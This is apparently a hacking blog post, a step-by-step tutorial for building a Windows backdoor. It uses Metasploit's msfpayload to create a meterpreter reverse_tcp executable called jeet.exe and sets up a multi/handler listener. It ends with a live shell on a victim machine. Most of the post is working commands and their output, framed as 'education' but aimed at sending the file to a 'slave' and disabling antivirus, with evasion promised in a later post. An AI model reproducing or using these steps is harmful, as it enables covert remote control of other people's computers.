root@bt:~# Backdoor(RAT) is powerful way of hack a system as far I know we can say that there is two kind of attack one on LAN and second one over internet(out side our LAN network) well here we will try first one attack for education purpose than next will be for outside LAN network. If we will check our IP there is two kind of IP one we can say internal IP which start something like 192.168.1.1 and we can find it on windows'
>>>open terminal and type ifconfig like this
root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:e1:93:4a
inet addr:192.168.1.101 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2343 errors:0 dropped:0 overruns:0 frame:0
TX packets:2039 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2216117 (2.2 MB) TX bytes:480558 (480.5 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:95 errors:0 dropped:0 overruns:0 frame:0
TX packets:95 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6545 (6.5 KB) TX bytes:6545 (6.5 KB)
root@bt:~# here inet addr:192.168.1.101 this is my internal ip for lan attack we have to use internal IP and for Wan(out side LAN network) we have to use our external IP which we can find out fromhttp://whatsmyip.org. lets create a payload, windows/meterpreter/reverse_tcp is best for me but you can use other one too for check 'bash: syntax error near unexpected token `('
bash: follow this
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfpayload -l
Framework Payloads (228 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsd/x86/exec Execute an arbitrary command
bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged)
bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsd/x86/shell_find_port Spawn a shell on an established connection
bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged)
bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell
bsdi/x86/shell_find_port Spawn a shell on an established connection
bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/generic Executes the supplied command
cmd/unix/interact Interacts with a shell on an established socket connection
cmd/unix/reverse Creates an interactive shell through two inbound connections ...............................................read Description of payload and use as your requirement, well we will use meterpreter/reverse_tcp for create backdoor.exe(rat)
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 x > /root/jeet.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.101", "LPORT"=>"4444"}
here is payload we can see lhost our internal IP and port to listen connection back you can use other port if u like and this file we can find at home folder if u want to create this on desktop use this >/root/Desktop/jeet.exe
here we can change nick jeet.exe whatever u like
Note :- jeet.exe can be detected by antiruses because this is not Fud or encoded in next doc I will try to clear about bypassing AV's but for testing here you have to silent or disable ur antivirus now before open this file we have to start a listener on local host first
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 763 exploits - 404 auxiliary - 118 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r14281 updated 10 days ago (2011.11.18)
Warning: This copy of the Metasploit Framework was last updated 10 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
msf > msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...
Same payload we have to use which we used in back door file, host and port should be same than finally give exploit
command.If you see starting the payload handler ...........now we can send this file to our slave but as I said before this attack for LAN so we can test it on our windows system before that we have to diable our antivurs than open jeet.exe on windows and see what happen
after opening file we can see this if every thing goes well
[*] Started reverse handler on 192.168.1.101:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:27885) at 2011-11-28 21:32:52 +0300
meterpreter > meterpreter > shell
Process 4976 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
H:\ftp>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection* 15:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Wireless LAN adapter Wireless Network Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1d69:435e:2a5d:d90f
IPv4 Address. . . . . . . . . . . : 192.168.1.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
.................................................
H:\ftp> now u can play with windows system. if u dont know what to do after this than ask I will try to make a docs on this how to control over slave pc after getting a session hope this helps
here i want to post an video which i created long before that shows same kind of attack http://www.youtube.com/user/jatin4u2020#p/u/14/8ymkcqslSRw
[#]This post was written by Mr.Jeet Kumar. Join his facebook group Real Way Hacking
No comments:
Post a Comment